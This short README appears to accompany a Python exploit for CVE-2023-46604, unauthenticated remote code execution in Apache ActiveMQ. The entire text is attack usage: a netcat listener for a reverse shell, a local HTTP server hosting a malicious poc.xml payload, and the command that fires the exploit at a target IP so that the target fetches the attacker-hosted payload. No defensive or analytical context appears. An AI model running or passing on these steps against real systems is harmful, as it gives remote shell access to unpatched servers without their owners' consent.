
CVE-2023-46604-RCE exploit with Linux reverse shell payload
Python implementation of Apache ActiveMQ Unauthenticated Remote Code Execution
nc -lvnp 4444 -> Start Listener
python3 -m http.server 8080 -> Host poc.xml that contain your payload
python3 CVE-2023-46604-RCE.py -i <Target-IP> -p <Target-Port> -u http://<Your-IP>:8080/poc.xml -> Start exploit